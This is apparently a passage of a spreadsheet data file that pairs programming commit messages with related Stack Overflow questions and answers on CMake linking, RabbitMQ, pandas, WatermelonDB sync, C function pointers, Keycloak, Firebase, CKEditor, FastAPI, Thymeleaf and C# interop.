&lt;pre&gt;&lt;code&gt;Project dir
|_ source
|  |_ common       (SOURCE)
|  |_ componentA   (SOURCE) Depend on common
|_ test
|  |_ testA        (TEST) Depend on common and componentA
|_ CmakeList.txt   (TOP)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As to code, it looks like this.&lt;/p&gt;
&lt;h1&gt;TOP&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;add_library(global_property INTERFACE)
# ... some options here
add_subdirectory(source)
add_subdirectory(test)
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;common&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;add_library(common_obj OBJECT)
target_link_libraries(common_obj PUBLIC global_property)
add_library(common_shared SHARED $&amp;lt;TARGET_OBJECTS:common_obj&amp;gt;)
add_library(common_static STATIC $&amp;lt;TARGET_OBJECTS:common_obj&amp;gt;)
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;componentA&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;add_library(componentA_obj OBJECT)
target_link_libraries(componentA_obj PUBLIC global_property common_static)
add_library(componentA_shared SHARED $&amp;lt;TARGET_OBJECTS:componentA_obj&amp;gt;)
add_library(componentA_static STATIC $&amp;lt;TARGET_OBJECTS:componentA_obj&amp;gt;)
target_link_libraries(componentA_shared common_static)  // my question here
target_link_libraries(componentA_static common_static)  // my question here
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;testA&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;add_executable(testA)
target_link_libraries(testA componentA_static)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When compiled, testA reports that content of common is not able to be found. It turns out that componentA_static still needs to link common_static to compile testA, respecting the fact that componentA_obj has already linked common_static.&lt;/p&gt;
&lt;p&gt;Is this the only way to use it if componentA must link common_static? If common_static is required a second link, does it also mean global_property has to be linked again as well?
Or perphaps there is a better way to manage libs?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;====================== Second Edition =======================&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Click &lt;a href="https://github.com/FiguraDoge/cmake" rel="nofollow noreferrer"&gt;github/FiguraDoge/cmake&lt;/a&gt; to download the exmaple.
The lines troubled me is in source/component/CMakeLists.txt, line 10 &amp;amp; 11.
The build of test_component would fail, if those two lines are commented.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C95</t>
  </si>
  <si>
    <t>Submission Worker: Modifies heartbeat_interval of rabbitmq worker (#973)
For more details about the issue, please see http://stackoverflow.com/questions/36123006/rabbitmq-closes-connection-when-processing-long-running-tasks-and-timeout-settin</t>
  </si>
  <si>
    <t>I've run into the same problem with my systems, that you are seeing, with dropped connection during very long tasks.
It's possible the heartbeat might help keep your connection alive, if your network setup is such that idle TCP/IP connections are forcefully dropped. If that's not the case, though, changing the heartbeat won't help.
Changing the connection timeout won't help at all. This setting is only used when initially creating the connection.
I am using a RabbitMQ producer to send long running tasks (30 mins+) to a consumer. The problem is that the consumer is still working on a task when the connection to the server is closed and the unacknowledged task is requeued.
there are two reasons for this, both of which you have run into already:
Connections drop randomly, even under the best of circumstances
Re-starting a process because of a re-queued message can cause problems
Having deployed RabbitMQ code with tasks that range from less than a second, out to several hours in time, I found that acknowledging the message immediately and updating the system with status messages works best for very long tasks, like this.
You will need to have a system of record (probably with a database) that keeps track of the status of a given job.
When the consumer picks up a message and starts the process, it should acknowledge the message right away and send a "started" status message to the system of record.
As the process completes, send another message to say it's done.
This won't solve the dropped connection problem, but nothing will 100% solve that anyways. Instead, it will prevent the message re-queueing problem from happening when a connection is dropped.
This solution does introduce another problem, though: when the long running process crashes, how do you resume the work?
The basic answer is to use the system of record (your database) status for the job to tell you that you need to pick up that work again. When the app starts, check the database to see if there is work that is unfinished. If there is, resume or restart that work in whatever manner is appropriate.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The basics of using Pandas &lt;em&gt;where&lt;/em&gt; with callables seems simple.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;np.random.seed(0)
df = pd.DataFrame(np.random.randn(8, 4), columns=['A', 'B', 'C', 'D'])
df[&amp;quot;test&amp;quot;] = range(1,9)
def MyBool(x):
    print(1)
    return ( x &amp;gt; 0 )
def MyFunc(x1):
    print(1)
    return x1['A']
df.where(
    cond  = lambda x: MyBool(x),
    other = lambda x: MyFunc(x) ,
    )
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the code above, I am replacing the values of all columns with the value of column A whenever the value of the col is less than 0. Note, I know I don't need to use callables for this simple example.&lt;/p&gt;
&lt;p&gt;Based on my analysis, this is what is happening under the hood.&lt;/p&gt;
&lt;p&gt;First, MyFunc is evaluated where the argument is the df itself. This returns a 8x1 df (=A)&lt;/p&gt;
&lt;p&gt;Second, the MyBool is evaluated which returns a 8x5 boolean df.&lt;/p&gt;
&lt;p&gt;Third, (not sure about this last step) for all entries (i,j) where MyBool returned False, the value of the i'th row of the output of MyFunc is used to replace the current value of the df.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;This leads me on to my question&lt;/strong&gt;: how does this extend to the cases when MyFunc returns a dataframe with several columns and rows? How does the function determine which entries need to be replaced and with which values?&lt;/p&gt;
&lt;p&gt;For illustrative purposes, suppose now that we want to divide B and C by 2 when test is equal to 5. The code I have provided below works but I don't quite understand how it determines which entries are to be replaced and with which values.&lt;/p&gt;
&lt;p&gt;MyBool still returns a one dimensional vector but MyFunc returns a dataframe. If the previous logic I explained was correct, then shouldn't it replace each False entry with the dataframe? Indeed, if this were the case, the resulting dataframe should be bigger than the input df.&lt;/p&gt;
&lt;p&gt;I've been reading the documentation and playing with different examples but can't figure this one out.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def MyBool(x):
    output = x.test != 5
    return output
def MyFunc(x1):
    x1.loc[ x1.test == 5, [&amp;quot;B&amp;quot;, &amp;quot;C&amp;quot;] ] /= 2
    return x1
df.where(
    cond  = lambda x: MyBool(x),
    other = lambda x: MyFunc(x.copy()),
    axis  = 0
    )
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C950</t>
  </si>
  <si>
    <t>Write up Sync details
In the current documentation you mention using a sync engine with the current synchronization primitives. Did you have specific ones in mind? I'd like to see if i can get something working
@luisgregson that might be difficult for you to figure out before we push documentation and some helper functions for it, but just in short:
All records have _status and _changed fields:
if _status is created, it's a new record to push to server
if _status is updated, it's a record to update
when you pull data from server, and you have something updated on both client, and server, you have to resolve a conflict. there will be a helper function for it. But _changed will have comma-separated names of column names that were changed on client since last sync. you can use that to resolve the conflict (client-changed columns shall win over server)
to get records deleted on the client, use adapter.getDeletedRecords. this will give you IDs of stuff to delete on the server.
after sync, use adapter.destroyDeletedRecords to permanently remove records marked as deleted before, and created/updated records mark as _status='synced', _changed=''.
Again, there will be a few helper functions so that it's straightforward.
Yes, it tracks which columns were changed since the last sync.
If you do:
record.update(() =&gt; {
  record.text = 'abc'
  record.fooBar = 10 // the @field does `record._setRaw('foo_bar', 10)` under the hood
})
Watermelon will update _changed to be text,foo_bar. It's just comma separated names of columns (we figured that's going to be the simplest, fastest format).
This is so that if you have a conflict (server says that it has an updated record R1, but local R1's status is also updated), you can take the server's version and only replace the columns that were changed locally.
After sync (after you send the local versions of records to the server), you're supposed to set the status to 'synced' and reset '_changed' to ''.
If the status is 'created', then changes are not tracked (since the whole record is going to be new to the database).
Is there a recommended way to set the _status, _changed and last_modified fields? I'm currently using record._raw = sanitizedRaw(...) for everything but I thought a helper function might be helpful here.
Using sanitizedRaw in sync code is fine! Agreed, a bunch of helper functions would be useful (for finding all the records to sync, resolving the conflicts automatically, etc.)
Is there a way to find the maximum last_modified time in a collection without retrieving all records? I'm currently storing it using db.adapter.getLocal/setLocal but that doesn't seem ideal.
I think we're doing the same thing. I agree it's not ideal. But I don't know all the details. I think this is partly an artifact of the backend system we use. @Stanley knows more about this.
Theoretically it should be possible but let me describe some edge cases:
That’s generally a problem of being able to make sure that IDs are unique. I know that for instance with UUIDs there’s negligible chance of IDs not being unique (https://stackoverflow.com/questions/1155008/how-unique-is-uuid) but let’s assume they may not be random enough to be unique:
Let’s assume that there’s client (1) and (2) that due to bad luck generated the same ID x for a record. (1) already synced it’s record to the backend. So in the backend we have a record with ID x. Now (2) attempts to sync the record with ID x. The backend is going to reject it. (2) would now have to generate a new ID y and attempt to sync to the backend again. Also (2) needs to update all its relations to now use y instead of x. What happens when some part of these relations was already synced to the backend? Then also these need to be updated. Surely theoretically possible but definitely it would be better to just avoid this situation in the first place. And an easy solution to avoid this is to use client and server side IDs and just map them in the network layer of the synchronisation. That way the backend doesn’t have to be aware of multiple clients and the client doesn’t have to be aware of the backend side IDs at all.
See for instance https://softwareengineering.stackexchange.com/questions/287163/generation-of-ids-in-offline-online-application and https://softwareengineering.stackexchange.com/questions/236309/strategy-for-generating-unique-and-secure-identifiers-for-use-in-a-sometimes-of for some discussion around this topic.
Also this here is helpful: https://tech.trello.com/sync-two-id-problem/
Apart from that there’s also security considerations about generating IDs client side - on which I’m not an expert so I’d refer to some discussion thread here again: https://stackoverflow.com/questions/105034/create-guid-uuid-in-javascript?noredirect=1&amp;lq=1 and https://stackoverflow.com/questions/1296234/is-there-any-danger-to-creating-uuid-in-javascript-client-side</t>
  </si>
  <si>
    <t xml:space="preserve">What type of architecture, design and software would one need to provide something similar to the excellent custom report functionality provided by google analytics.  To be more specific we want to user to be able to specify dimensions and metrics from a list and generate a report.
Do we need a data warehouse? 
Do we need OLAP? 
Would the data access
layer require an ORM, dynamic sql or
stored procedures? 
Are there any 3rd
party or opensource products that can
get us part way there?
Is there anybody else (company, developer) out there who have even accomplished this functionality at the level of google?  Example?
Note
I'm not interested in building a google analytics competitor.  I'm looking to apply the ease of reporting to our own unique datasets.
Thanks
</t>
  </si>
  <si>
    <t>C951</t>
  </si>
  <si>
    <t>Refactor Capture STDOUT into a Test Helper
Refactor the capturing of standard output `STDOUT` into a reusable test
helper as `capture_output` that accepts an incoming void function with
no arguments and will executed it as a callback within its code to then
return the expected stdout as a character `char` array.
== Notes:
- Update `hello_world` method to not return `void` instead of `int`
  since it is not necessary
== References:
- [How do you pass a function as a parameter in C? \- Stack Overflow]
  (https://stackoverflow.com/questions/9410/how-do-you-pass-a-function-as-a-parameter-in-c)
- [Callback functions in c\+\+ \- Stack Overflow]
  (https://stackoverflow.com/questions/2298242/callback-functions-in-c)
- [Creating your own header file in C \- Stack Overflow]
  (https://stackoverflow.com/questions/7109964/creating-your-own-header-file-in-c)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Declaration&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A prototype for a function which takes a function parameter looks like the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void func ( void (*f)(int) );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This states that the parameter &lt;code&gt;f&lt;/code&gt; will be a pointer to a function which has a &lt;code&gt;void&lt;/code&gt; return type and which takes a single &lt;code&gt;int&lt;/code&gt; parameter. The following function (&lt;code&gt;print&lt;/code&gt;) is an example of a function which could be passed to &lt;code&gt;func&lt;/code&gt; as a parameter because it is the proper type:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void print ( int x ) {
  printf("%d\n", x);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Function Call&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;When calling a function with a function parameter, the value passed must be a pointer to a function. Use the function's name (without parentheses) for this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;func(print);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;would call &lt;code&gt;func&lt;/code&gt;, passing the print function to it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Function Body&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As with any parameter, &lt;code&gt;func&lt;/code&gt; can now use the parameter's name in the function body to access the value of the parameter. Let's say that &lt;code&gt;func&lt;/code&gt; will apply the function it is passed to the numbers 0-4. Consider, first, what the loop would look like to call print directly:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for ( int ctr = 0 ; ctr &amp;lt; 5 ; ctr++ ) {
  print(ctr);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Since &lt;code&gt;func&lt;/code&gt;'s parameter declaration says that &lt;code&gt;f&lt;/code&gt; is the name for a pointer to the desired function, we recall first that if &lt;code&gt;f&lt;/code&gt; is a pointer then &lt;code&gt;*f&lt;/code&gt; is the thing that &lt;code&gt;f&lt;/code&gt; points to (i.e. the function &lt;code&gt;print&lt;/code&gt; in this case). As a result, just replace every occurrence of print in the loop above with &lt;code&gt;*f&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void func ( void (*f)(int) ) {
  for ( int ctr = 0 ; ctr &amp;lt; 5 ; ctr++ ) {
    (*f)(ctr);
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="http://math.hws.edu/bridgeman/courses/331/f05/handouts/c-c++-notes.html" rel="noreferrer"&gt;Source&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a multi-tenant backend Quarkus (java) application that is configured to use Keycloak for openId authentication:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;quarkus.oidc.client-id=easypass
quarkus.oidc.authentication.scopes=openid,email,profile,roles
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The easypass client has Client Authentication enabled, and it supports standard flow, direct access grant, implicit flow, and service account roles.&lt;/p&gt;
&lt;p&gt;Each tenant has its realm (e.g. &amp;quot;acme&amp;quot;) and the easypass client is declared in each of those realms.&lt;/p&gt;
&lt;p&gt;I would like to use a keycloak (preferrably per-tenant) admin user in the master realm to access the backend REST API, and I can't figure out how to achieve this.&lt;/p&gt;
&lt;p&gt;In master I have an &amp;quot;acme-realm&amp;quot; public client (1 per tenant) which I assume I should use somehow for this?
I created an acme-admin user in master, but I don't know where to go from there?&lt;/p&gt;
&lt;p&gt;I can get a token for acme-admin using password grant for the admin-cli client, but not for either the acme-realm or easypass clients.&lt;/p&gt;
&lt;p&gt;If I understand correctly I need to obtain a token for acme-admin in realm acme for the easypass client... how do I get there?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C952</t>
  </si>
  <si>
    <t>Work on the refactoring of the services of the firebase database
https://stackoverflow.com/questions/36435647/promises-in-angular2-with-firebase
https://stackoverflow.com/questions/41885219/angular-2-firebase-observable-to-promise-doesnt-return-anything
https://stackoverflow.com/questions/40979352/access-this-in-firebase-angular2-promise</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Problem occurs because you are trying to using &lt;code&gt;.then&lt;/code&gt; over a method which isn't using promise. Basically missed to return &lt;code&gt;promise&lt;/code&gt; from &lt;code&gt;getPlayers&lt;/code&gt; method, you should return promise from there to perform promise chaining using &lt;code&gt;.then&lt;/code&gt; method over it.&lt;/p&gt;
&lt;p&gt;Also don't use callback to return value from it(because callback are not capable of returning anything from it), use &lt;code&gt;.then&lt;/code&gt; function over &lt;code&gt;.once&lt;/code&gt; so that you can extend promise chain &amp;amp; will be able to return out data correctly.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Code&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;getPlayers() {
    //returned promise here
    return this.playersRef.once('value').then((snap) =&amp;gt; {
        return snap.val();
    });
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I've been working with C and C# for ages, I consider myself a "pretty good" programmer, but as has been pointed out many times, programming is only a small facet of software engineering and development.  I'm the sole coder for my department but it looks like that is going to begin to change, what I would like to know from the Stackoverflow community is the following.
What does it take to move from coder to developer - I've read Code Complete so I think i'm ready to take that plunge.  To some degree I already am.
What tools should I use when doing models of my software - assume C#
How deeply should I model my architecture before setting down hard and fast code? - I realize how subjective this question is, and I'd like rules of thumb more than "well it depends."  Assume i'm writing in house tools that are intended to "last 5-10 years"
What advice would you be willing to give to someone making the move from codeing to engineering?
Thank you all in advance! Have a great Memorial day!
</t>
  </si>
  <si>
    <t>C953</t>
  </si>
  <si>
    <t>CKEditor instead of Wysihtml 
CKEditor seems to be a good match for this project, and is more documented / followed.
Maybe it could help in resolving Wysihtml5 Error when updating template in #63 &amp; #12 .
To be tested while we're still in Alpha.
http://stackoverflow.com/questions/16284447/inline-ckeditor-integration-with-knockoutjs
http://stackoverflow.com/questions/29326909/how-to-update-ckeditor-data-when-binding-it-as-knockout-observable
Ideas to use the CKeditor with Knockout bindings</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;You have to write your custom binding handler in order for your observable property to be linked with an instance of CKEditor.&lt;/p&gt;
&lt;p&gt;First, you could start from the custom binding found &lt;a href="http://ckeditor.com/forums/Support/Not-working-knockoutjs" rel="noreferrer"&gt;here&lt;/a&gt;. One of the posts contains a custom binding, though I'm not sure it works. You have to check. I copied it down here, credits do not go to me of course:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ko.bindingHandlers.ckEditor = {
    init: function (element, valueAccessor, allBindingsAccessor, viewModel) {
        var txtBoxID = $(element).attr("id");
        var options = allBindingsAccessor().richTextOptions || {};
        options.toolbar_Full = [
            ['Source', '-', 'Format', 'Font', 'FontSize', 'TextColor', 'BGColor', '-', 'Bold', 'Italic', 'Underline', 'SpellChecker'],
            ['NumberedList', 'BulletedList', '-', 'Outdent', 'Indent', '-', 'Blockquote', 'CreateDiv', '-', 'JustifyLeft', 'JustifyCenter', 'JustifyRight', 'JustifyBlock', '-', 'BidiLtr', 'BidiRtl'],
            ['Link', 'Unlink', 'Image', 'Table']
        ];
        // handle disposal (if KO removes by the template binding)
        ko.utils.domNodeDisposal.addDisposeCallback(element, function () {
            if (CKEDITOR.instances[txtBoxID]){ 
                CKEDITOR.remove(CKEDITOR.instances[txtBoxID]); 
            }
        });
        $(element).ckeditor(options);
        // wire up the blur event to ensure our observable is properly updated
        CKEDITOR.instances[txtBoxID].focusManager.blur = function () {
            var observable = valueAccessor();
            observable($(element).val());
        };
    },
    update: function (element, valueAccessor, allBindingsAccessor, viewModel) {
        var val = ko.utils.unwrapObservable(valueAccessor());
        $(element).val(val);
    }
} 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A typical use then would be in the HTML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;textarea id="txt_viewModelVariableName" 
          data-bind="ckEditor: viewModelVariableName"&amp;gt;&amp;lt;/textarea&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Secondly, you could check out the &lt;a href="https://github.com/SteveSanderson/knockout/wiki/Bindings---tinyMCE" rel="noreferrer"&gt;custom binding handler for TinyMCE&lt;/a&gt; initially written by Ryan Niemeyer and updated by other talented people. Maybe &lt;a href="http://www.tinymce.com/" rel="noreferrer"&gt;TinyMCE&lt;/a&gt; could work out for you instead of CKEditor ? &lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on an Angular project and I want to implement a dynamic translation using jhiTranslate and JHipster. I have a text that contains two dynamic values that need to be displayed. Here's what I'm trying to achieve:&lt;/p&gt;
&lt;pre class="lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;span&amp;gt;
  Do you want to remove the variable 
  &amp;lt;strong&amp;gt;{{ variable.ane }}&amp;lt;/strong&amp;gt; from the object 
  &amp;lt;strong&amp;gt;{{ object.name }}&amp;lt;/strong&amp;gt;?
&amp;lt;/span&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I configure this text with jhiTranslate and JHipster so that the dynamic values are correctly replaced?&lt;/p&gt;
&lt;p&gt;I've attempted to use placeholders directly in the HTML with jhiTranslate, but I've run into some issues. Any help or example code would be greatly appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C954</t>
  </si>
  <si>
    <t>Reorganize to be more MVC-like (source: https://stackoverflow.com/a/64987404)</t>
  </si>
  <si>
    <t xml:space="preserve">I've been toying with the SimplyRestfulRouting assembly that comes with the MvcContrib extras, and for the most part I really like that it quickly sets up my routes and leaves me with a good convention to follow in my controllers.  However, I'm still trying to wrap my head around REST as it applies to rich internet applications and occasionally feel pigeon holed when I need to do something that falls outside the scope of those 8 or 9 default routes. [Edit: By "pigeon holed", I simply mean I feel like I'm dirtying up the application when I have to create a controller action that is outside the definition of the default "restful routes".]
I heard a comment from a REST proponent in which he stated his opinion that the MVC framework is inherently RESTful, and it got me thinking a bit more about what libraries like the MvcContrib SimplyRestfulRouting are actually buying me.
Not having read a lot about the concrete pricinples of REST, I'm looking for input as to what benefits might come from enforcing such a thing in the context of a forms-over-data, RIA.  And with regards to AJAX, how does a RESTful architecture affect my client interaction?
It's likely I'm misunderstanding the use of REST in this context, and would appreciate some StackOverflow mojo to get my head on straight.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Harsha already mentioned my &lt;a href="https://github.com/ycd/manage-fastapi" rel="noreferrer"&gt;project generator&lt;/a&gt; but I think it can be helpful for future readers to explain the ideas behind of it.&lt;/p&gt;
&lt;p&gt;If you are going to serve your frontend something like &lt;strong&gt;yarn&lt;/strong&gt; or &lt;strong&gt;npm&lt;/strong&gt;. You should not worry about the structure between them. With something like &lt;strong&gt;axios&lt;/strong&gt; or the Javascript's &lt;strong&gt;fetch&lt;/strong&gt; you can easily talk with your backend from anywhere.&lt;/p&gt;
&lt;p&gt;When it comes to structuring the backend, if you want to render templates with Jinja, you can have something that is close to MVC Pattern.&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;your_project
â”œâ”€â”€ __init__.py
â”œâ”€â”€ main.py
â”œâ”€â”€ core
â”‚   â”œâ”€â”€ models
â”‚   â”‚   â”œâ”€â”€ database.py
â”‚   â”‚   â””â”€â”€ __init__.py
â”‚   â”œâ”€â”€ schemas
â”‚   â”‚   â”œâ”€â”€ __init__.py
â”‚   â”‚   â””â”€â”€ schema.py
â”‚   â””â”€â”€ settings.py
â”œâ”€â”€ tests
â”‚   â”œâ”€â”€ __init__.py
â”‚   â””â”€â”€ v1
â”‚       â”œâ”€â”€ __init__.py
â”‚       â””â”€â”€ test_v1.py
â””â”€â”€ v1
    â”œâ”€â”€ api.py
    â”œâ”€â”€ endpoints
    â”‚   â”œâ”€â”€ endpoint.py
    â”‚   â””â”€â”€ __init__.py
    â””â”€â”€ __init__.py 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;By using &lt;code&gt;__init__&lt;/code&gt; everywhere, we can access the variables from the all over the app, just like Django.&lt;/p&gt;
&lt;p&gt;Let's the folders into parts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Core&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;models&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;database.py&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;schemas&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;users.py&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;something.py&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;settings.py&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;views&lt;/strong&gt; &lt;em&gt;(Add this if you are going to render templates)&lt;/em&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;v1_views.py&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;v2_views.py&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;tests&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;v1&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;v2&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Models&lt;/h3&gt;
&lt;p&gt;It is for your database models, by doing this you can import the same database session or object from v1 and v2.&lt;/p&gt;
&lt;h3&gt;Schemas&lt;/h3&gt;
&lt;p&gt;Schemas are your Pydantic models, we call it schemas because it is actually used for creating OpenAPI schemas since FastAPI is based on OpenAPI specification we use schemas everywhere, from Swagger generation to endpoint's expected request body.&lt;/p&gt;
&lt;h3&gt;settings.py&lt;/h3&gt;
&lt;p&gt;It is for &lt;a href="https://pydantic-docs.helpmanual.io/usage/settings/" rel="noreferrer"&gt;Pydantic's Settings Management&lt;/a&gt; which is extremely useful, you can use the same variables without redeclaring it, to see how it could be useful for you check out our documentation for &lt;a href="https://fastapi.tiangolo.com/advanced/settings/" rel="noreferrer"&gt;Settings and Environment Variables&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Views&lt;/h3&gt;
&lt;p&gt;This is optional if you are going to render your frontend with Jinja, you can have something close to MVC pattern&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Core&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;views&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;v1_views.py&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;v2_views.py&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It would look something like this if you want to add views.&lt;/p&gt;
&lt;h3&gt;Tests&lt;/h3&gt;
&lt;p&gt;It is good to have your tests inside your backend folder.&lt;/p&gt;
&lt;h3&gt;APIs&lt;/h3&gt;
&lt;p&gt;Create them independently by APIRouter, instead of gathering all your APIs inside one file.&lt;/p&gt;
&lt;h3&gt;Notes&lt;/h3&gt;
&lt;p&gt;You can use absolute import for all your importing since we are using &lt;code&gt;__init__&lt;/code&gt; everywhere, see &lt;a href="https://docs.python.org/3/tutorial/modules.html#packages" rel="noreferrer"&gt;Python's packaging&lt;/a&gt; docs.&lt;/p&gt;
&lt;p&gt;So assume you are trying to import &lt;strong&gt;v1's endpoint.py&lt;/strong&gt; from &lt;strong&gt;v2&lt;/strong&gt;, you can simply do&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;from my_project.v1.endpoints.endpoint import something
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C955</t>
  </si>
  <si>
    <t>added test mvc pattern, see https://stackoverflow.com/questions/17692941/values-for-thfield-attributes-in-checkbox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am not sure if this is the answer you seek, but you can find an example at &lt;a href="http://www.thymeleaf.org/doc/html/Thymeleaf-Spring3.html#checkbox-fields"&gt;http://www.thymeleaf.org/doc/html/Thymeleaf-Spring3.html#checkbox-fields&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Here is a simple example to illustrate how to use a checkbox in Thymeleaf with Spring MVC.&lt;/p&gt;
&lt;p&gt;Controller:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@RequestMapping(value = "/showForm", method=RequestMethod.GET)
public String showForm(Model model) {
  List&amp;lt;String&amp;gt; allItems = new ArrayList&amp;lt;String&amp;gt;();
  allItems.add("value1");
  allItems.add("value2");
  allItems.add("value3");
  model.addAttribute("allItems", allItems);
  Foo foo = new Foo();
  List&amp;lt;String&amp;gt; checkedItems = new ArrayList&amp;lt;String&amp;gt;();
  // value1 will be checked by default.
  checkedItems.add("value1");
  foo.setCheckedItems(checkedItems);
  model.addAttribute("foo", foo);
  ...
}
@RequestMapping(value = "/processForm", method=RequestMethod.POST)
public String processForm(@ModelAttribute(value="foo") Foo foo) {
  // Get value of checked item.
  List&amp;lt;String&amp;gt; checkedItems = foo.getCheckedItems();
  ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;html:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;form action="#" th:action="@{/processForm}" th:object="${foo}" method="post"&amp;gt;
  &amp;lt;div th:each="item : ${allItems}"&amp;gt;
    &amp;lt;input type="checkbox" th:field="*{checkedItems}" th:value="${item}" /&amp;gt;
    &amp;lt;label th:text="${item}"&amp;gt;example&amp;lt;/label&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;input type="submit" /&amp;gt;
&amp;lt;/form&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Foo.java:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Foo {
  private List&amp;lt;String&amp;gt; checkedItems;
  public List&amp;lt;String&amp;gt; getCheckedItems() {
    return checkedItems;
  }
  public void setCheckedItems(List&amp;lt;String&amp;gt; checkedItems) {
    this.checkedItems = checkedItems;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Hope this helps.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have problems in having the setlocale method working via a DllImport from .NET code. Calling it natively in a c++ module works fine.
My test scenario is as follows:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Declare the method in a C# file:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;[DllImport(&amp;quot;msvcrt.dll&amp;quot;, CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Ansi)]
public static extern IntPtr setlocale(int category, [MarshalAs(UnmanagedType.LPStr)] string locale);
public static string SetLocale(int category, string locale)
{
